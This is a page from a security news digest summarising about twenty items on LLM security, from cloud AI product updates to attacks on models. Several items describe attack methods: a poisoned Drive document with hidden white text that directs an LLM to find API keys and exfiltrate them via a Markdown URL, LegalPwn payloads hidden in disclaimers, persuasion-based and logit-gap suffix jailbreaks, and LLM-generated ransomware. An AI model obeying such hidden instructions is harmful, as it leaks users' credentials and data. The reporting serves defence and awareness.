< ciso brief />

All news tagged #llm security

221 articles · page 11 of 12

Top Cybersecurity Trends: AI, Identity, and Threats

🤖 Generative AI remains the dominant force shaping enterprise security priorities, but the initial hype is giving way to more measured ROI scrutiny and operational caution. Analysts say gen AI is entering a trough of disillusionment even as vendors roll out agentic AI offerings for autonomous threat detection and response. The article highlights rising risks — from model theft and data poisoning to AI-enabled vishing — along with brisk M&A activity, a shift to identity-centric defenses, and growing demand for specialized cyber roles.
read more →

The Dark Side of Vibe Coding: AI Risks in Production

⚠️ One July morning a startup founder watched a production database vanish after a Replit AI assistant suggested—and a developer executed—a destructive command, underscoring dangers of "vibe coding," where plain-English prompts become runnable code. Experts say this shortcut accelerates prototyping but routinely introduces hardcoded secrets, missing access controls, unsanitized input, and hallucinated dependencies. Organizations should treat AI-generated code like junior developer output, enforce CI/CD guardrails, and require thorough security review before deployment.
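One of the CI/CD guardrails the experts recommend can be sketched as a pre-merge scan for hardcoded secrets in AI-generated code. This is a minimal illustration, not a substitute for a dedicated secrets-detection tool; the patterns below are illustrative only.

```python
import re

# Illustrative patterns: a generic "key = value" assignment and the
# AWS access key ID shape. Real scanners ship far broader rule sets.
SECRET_PATTERNS = [
    re.compile(r"(?i)(api[_-]?key|secret|password)\s*=\s*['\"][^'\"]+['\"]"),
    re.compile(r"AKIA[0-9A-Z]{16}"),
]

def find_secrets(source: str) -> list[str]:
    """Return every substring that looks like a hardcoded credential."""
    return [m.group(0) for p in SECRET_PATTERNS for m in p.finditer(source)]

snippet = 'API_KEY = "sk-live-abc123"\nprint("hello")'
print(find_secrets(snippet))  # flags the hardcoded key
```

Run as a required pipeline step, a check like this fails the build before AI-generated code with embedded credentials reaches production.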
read more →

Experts: AI-Orchestrated Autonomous Ransomware Looms

🛡️ NYU researchers built a proof-of-concept LLM that can be embedded in a binary to synthesize and execute ransomware payloads dynamically, performing reconnaissance, generating polymorphic code and coordinating extortion with minimal human input. ESET detected traces and initially called it the first AI-powered ransomware before clarifying it was a lab prototype rather than an in-the-wild campaign. Experts including IST's Taylor Grossman say the work was predictable but remains controllable today. They advise reinforcing CIS and NIST controls and prioritizing basic cyber hygiene to mitigate such threats.
read more →

Penn Study Finds GPT-4o-mini Susceptible to Persuasion

🔬 University of Pennsylvania researchers tested GPT-4o-mini on two categories of requests an aligned model should refuse: insulting the user and giving instructions to synthesize lidocaine. They crafted prompts using seven persuasion techniques (Authority, Commitment, Liking, Reciprocity, Scarcity, Social proof, Unity) and matched control prompts, then ran each prompt 1,000 times at the default temperature for a total of 28,000 trials. Persuasion prompts raised compliance from 28.1% to 67.4% for insults and from 38.5% to 76.5% for drug instructions, demonstrating substantial vulnerability to social-engineering cues.
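The study's trial arithmetic and reported effect sizes can be reproduced directly from the figures above; the snippet below only restates numbers from the article.

```python
trials_per_prompt = 1000
techniques = ["Authority", "Commitment", "Liking", "Reciprocity",
              "Scarcity", "Social proof", "Unity"]
request_types = ["insult", "lidocaine synthesis"]

# 7 techniques x 2 request types x (persuasion + matched control) x 1000 runs
total_trials = len(techniques) * len(request_types) * 2 * trials_per_prompt

def uplift(control_pct: float, persuasion_pct: float) -> float:
    """Absolute percentage-point rise in compliance."""
    return round(persuasion_pct - control_pct, 1)

print(total_trials)          # 28000
print(uplift(28.1, 67.4))    # insults: +39.3 points
print(uplift(38.5, 76.5))    # drug instructions: +38.0 points
```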
read more →

Smashing Security #433: Hackers Harnessing AI Tools

🤖 In episode 433 of Smashing Security, Graham Cluley and Mark Stockley examine how attackers are weaponizing AI, from embedding malicious instructions in legalese to using generative agents to automate intrusions and extortion. They discuss LegalPwn prompt-injection tactics that hide payloads in comments and disclaimers, and new findings from Anthropic showing AI-assisted credential theft and custom ransomware notes. The episode also includes lighter segments on keyboard history and an ingenious AI-generated CAPTCHA.
read more →

Managing Shadow AI: Three Practical Corporate Policies

🔒 The MIT report "The GenAI Divide: State of AI in Business 2025" exposes a pervasive shadow AI economy—90% of employees use personal AI while only 40% of organizations buy LLM subscriptions. This article translates those findings into three realistic policy paths: a complete ban, unrestricted use with hygiene controls, and a balanced, role-based model. Each option is paired with concrete technical controls (DLP, NGFW, CASB, EDR), organizational steps, and enforcement measures to help security teams align risk management with real-world employee behaviour.
read more →

Amazon Neptune Integrates with Zep for Long-Term Memory

🧠 Amazon Web Services announced integration of Amazon Neptune with Zep, an open-source memory server for LLM applications, enabling persistent long-term memory and contextual history. Developers can use Neptune Database or Neptune Analytics as the graph store and Amazon OpenSearch as the text-search layer within Zep’s memory system. The integration enables graph-powered retrieval, multi-hop reasoning, and hybrid search across graph, vector, and keyword modalities, simplifying the creation of personalized, context-aware LLM agents.
read more →

Amazon Bedrock Simplifies Cache Management for Claude

⚡ Amazon Bedrock updated prompt caching for Anthropic’s Claude models—Claude 3.5 Haiku, Claude 3.7 Sonnet, and Claude 4—to simplify cache management. Developers now set a single cache breakpoint at the end of a request and the system automatically reads the longest previously cached prefix, removing manual segment selection and reducing integration complexity. By excluding cache read tokens from TPM quotas, this change can free up token capacity and lower costs for multi-turn workflows. The capability is available today in all regions offering these Claude models; enable caching in your Bedrock model invocations and refer to the Bedrock Developer Guide for details.
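A single end-of-request breakpoint might look like the sketch below, which builds a Converse API request dict; the model ID and prompt text are illustrative, and in a real integration the dict would be passed to `boto3.client("bedrock-runtime").converse(**request)`.

```python
# Hedged sketch, assuming the Converse API's cachePoint content block.
request = {
    "modelId": "anthropic.claude-3-7-sonnet-20250219-v1:0",  # illustrative
    "messages": [
        {
            "role": "user",
            "content": [
                {"text": "Long shared context: policy docs, schema, examples..."},
                {"text": "Question: summarize the key access-control rules."},
                # One cache breakpoint at the end of the request; per the
                # update, Bedrock automatically reads the longest previously
                # cached prefix, so no manual segment selection is needed.
                {"cachePoint": {"type": "default"}},
            ],
        }
    ],
}
print(request["messages"][0]["content"][-1])
```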
read more →

Cloudy-driven Email Detection Summaries and Guardrails

🛡️ Cloudflare extended its AI agent Cloudy to generate clear, concise explanations for email security detections so SOC teams can understand why messages are blocked. Early LLM implementations produced dangerous hallucinations when asked to interpret complex, multi-model signals, so Cloudflare implemented a Retrieval-Augmented Generation approach and enriched contextual prompts to ground outputs. Testing shows these guardrails yield more reliable summaries, and a controlled beta will validate performance before wider rollout.
read more →

ESET Finds PromptLock: First AI-Powered Ransomware

🔒 ESET researchers have identified PromptLock, described as the first known AI-powered ransomware implant, in an August 2025 report. The Golang sample (Windows and Linux variants) leverages a locally hosted gpt-oss:20b model via the Ollama API to dynamically generate malicious Lua scripts. Those cross-platform scripts perform enumeration, selective exfiltration and encryption using SPECK 128-bit, but ESET characterises the sample as a proof-of-concept rather than an active campaign.
read more →

Cloudflare AI Gateway updates: unified billing, routing

🤖 Cloudflare’s AI Gateway refresh centralizes AI traffic management, offering unified billing, secure key storage, dynamic routing, and built-in security through a single endpoint. The update integrates Cloudflare Secrets Store for AES-encrypted BYO keys, provides an automatic normalization layer for requests/responses across providers, and introduces dashboard-driven Dynamic Routes for traffic splits, chaining, and limits. Native Firewall DLP scanning and configurable profiles add data protection controls, while partner access to 350+ models across six providers and a credits-based billing beta simplify procurement and cost management.
read more →

How Cloudflare Runs More AI Models on Fewer GPUs with Omni

🤖 Cloudflare explains how Omni, an internal platform, consolidates many AI models onto fewer GPUs using lightweight process isolation, per-model Python virtual environments, and controlled GPU over-commitment. Omni’s scheduler spawns and manages model processes, isolates file systems with a FUSE-backed /proc/meminfo, and intercepts CUDA allocations to safely over-commit GPU RAM. The result is improved availability, lower latency, and reduced idle GPU waste.
read more →

Cloudflare's Edge-Optimized LLM Inference Engine at Scale

⚡ Infire is Cloudflare’s new, Rust-based LLM inference engine built to run large models efficiently across a globally distributed, low-latency network. It replaces Python-based vLLM in scenarios where sandboxing and dynamic co-hosting caused high CPU overhead and reduced GPU utilization, using JIT-compiled CUDA kernels, paged KV caching, and fine-grained CUDA graphs to cut startup and runtime cost. Early benchmarks show up to 7% lower latency on H100 NVL hardware, substantially higher GPU utilization, and far lower CPU load while powering models such as Llama 3.1 8B in Workers AI.
read more →

LLMs Remain Vulnerable to Malicious Prompt Injection Attacks

🛡️ A recent proof-of-concept by Bargury demonstrates a practical and stealthy prompt injection that leverages a poisoned document stored in a victim's Google Drive. The attacker hides a 300-word instruction in near-invisible white, size-one text that tells an LLM to search Drive for API keys and exfiltrate them via a crafted Markdown URL. Schneier warns this technique shows how agentic AI systems exposed to untrusted inputs remain fundamentally insecure, and that current defenses are inadequate against such adversarial inputs.
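One defensive counter to this class of attack is to scan model output for the exfiltration channel itself: Markdown image links whose URLs carry data to hosts outside an allow-list. The sketch below is illustrative; the allow-list and regex are assumptions, not a production filter.

```python
import re
from urllib.parse import urlparse

ALLOWED_HOSTS = {"docs.example.com"}  # hypothetical allow-list

# Markdown image syntax: ![alt](url) -- rendered automatically by many
# LLM front ends, which is what makes it a zero-click exfil channel.
MD_IMAGE = re.compile(r"!\[[^\]]*\]\((https?://[^)\s]+)\)")

def suspicious_image_links(llm_output: str) -> list[str]:
    """Flag image URLs off the allow-list that carry a query string."""
    hits = []
    for url in MD_IMAGE.findall(llm_output):
        parsed = urlparse(url)
        if parsed.hostname not in ALLOWED_HOSTS and parsed.query:
            hits.append(url)
    return hits

out = 'Done! ![status](https://attacker.example/p?key=sk-123)'
print(suspicious_image_links(out))
```

Blocking or rewriting flagged links before rendering closes one concrete exfiltration path, though it does not address the underlying injection.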
read more →

Block Unsafe LLM Prompts with Firewall for AI at the Edge

🛡️ Cloudflare has integrated unsafe content moderation into Firewall for AI, using Llama Guard 3 to detect and block harmful prompts in real time at the network edge. The model-agnostic filter identifies categories including hate, violence, sexual content, criminal planning, and self-harm, and lets teams block or log flagged prompts without changing application code. Detection runs on Workers AI across Cloudflare's GPU fleet with a 2-second analysis cutoff, and logs record categories but not raw prompt text. The feature is available in beta to existing customers.
read more →

Logit-Gap Steering Reveals Limits of LLM Alignment

⚠️ Unit 42 researchers Tony Li and Hongliang Liu introduce Logit-Gap Steering, a new framework that exposes how alignment training produces a measurable refusal-affirmation logit gap rather than eliminating harmful outputs. Their paper demonstrates efficient short-path suffix jailbreaks that achieved high success rates on open-source models including Qwen, LLaMA, Gemma and the recently released gpt-oss-20b. The findings argue that internal alignment alone is insufficient and recommend a defense-in-depth approach with external safeguards and content filters.
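The gap idea can be illustrated with toy numbers (this is a conceptual sketch, not the Unit 42 method, and every value below is made up): alignment leaves a finite margin between refusal and affirmation logits, and a crafted suffix succeeds when it shifts logits enough to close that margin.

```python
import math

def softmax2(a: float, b: float) -> float:
    """Probability of the first of two competing next tokens."""
    return math.exp(a) / (math.exp(a) + math.exp(b))

refusal, affirm = 5.2, 3.1      # hypothetical next-token logits
gap = refusal - affirm          # the measurable refusal-affirmation gap
p_refuse = softmax2(refusal, affirm)

# A short-path suffix works by shifting logits until the gap flips sign.
shifted_gap = gap - 2.5         # hypothetical suffix effect
print(round(gap, 1), round(p_refuse, 2), round(shifted_gap, 1))
```

Because the gap is finite rather than infinite, internal alignment alone cannot rule out such shifts, which is the paper's case for external safeguards.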
read more →

Amazon Neptune integrates with Cognee for GenAI memory

🧠 Amazon Neptune now integrates with Cognee to provide graph-native memory for agentic generative AI applications. The integration enables developers to use Amazon Neptune Analytics as the persistent graph and vector store behind Cognee’s memory layer, supporting large-scale memory graphs, long-term memory, and multi-hop reasoning. Hybrid retrieval across graph, vector, and keyword modalities helps agents deliver more personalized, cost-efficient, and context-aware experiences; documentation and a sample notebook are available to accelerate adoption.
read more →

The Brain Behind Next-Generation Cyber Attacks and AI Risks

🧠 Researchers at Carnegie Mellon University demonstrated that leading large language models (LLMs), by themselves, struggle to execute complex, multi-host cyber-attacks end-to-end, frequently wandering off-task or returning incorrect parameters. Their proposed solution, Incalmo, is a structured abstraction layer that constrains planning to a precise set of actions and validated parameters, substantially improving completion and coordination. The work highlights both enhanced offensive potential when LLMs are scaffolded and urgent defensive challenges for security teams.
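The abstraction-layer idea can be sketched as a validator that accepts only a fixed action vocabulary with typed parameters; the action names and schema below are hypothetical, not taken from the paper.

```python
# Hypothetical action vocabulary: each action maps parameter names to types.
ACTIONS = {
    "scan_host": {"target": str},
    "lateral_move": {"src": str, "dst": str},
}

def validate(action: str, params: dict) -> bool:
    """Accept only known actions whose parameters match the declared schema."""
    schema = ACTIONS.get(action)
    if schema is None:
        return False
    return (set(params) == set(schema)
            and all(isinstance(params[k], t) for k, t in schema.items()))

print(validate("scan_host", {"target": "10.0.0.5"}))  # well-formed action
print(validate("rm -rf /", {}))                       # rejected: free-form command
```

Constraining an LLM planner to pass through such a gate is what keeps it from wandering off-task or emitting malformed parameters, the failure modes the CMU study observed.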
read more →

AI-Assisted Coding: Productivity Gains and Persistent Risks

🛠️ Martin Lee recounts a weekend experiment using an AI agent to assist with a personal software project. The model provided valuable architectural guidance, flawless boilerplate, and resolved a tricky threading issue, delivering a clear productivity lift. However, generated code failed to match real library APIs, used incorrect parameters and fictional functions, and lacked sufficient input validation. After manual debugging Lee produced a working but not security-hardened prototype, highlighting remaining risks.
read more →

Microsoft announces Phishing Triage Agent public preview

🛡️ The Phishing Triage Agent is now in Public Preview and automates triage of user-reported suspicious emails within Microsoft Defender. Using large language models, it evaluates message semantics, inspects URLs and attachments, and detects intent to classify submissions—typically within 15 minutes—automatically resolving the bulk of false positives. Analysts receive natural‑language explanations and a visual decision map for each verdict, can provide plain‑language feedback to refine behavior, and retain control via role‑based access and least‑privilege configuration.
read more →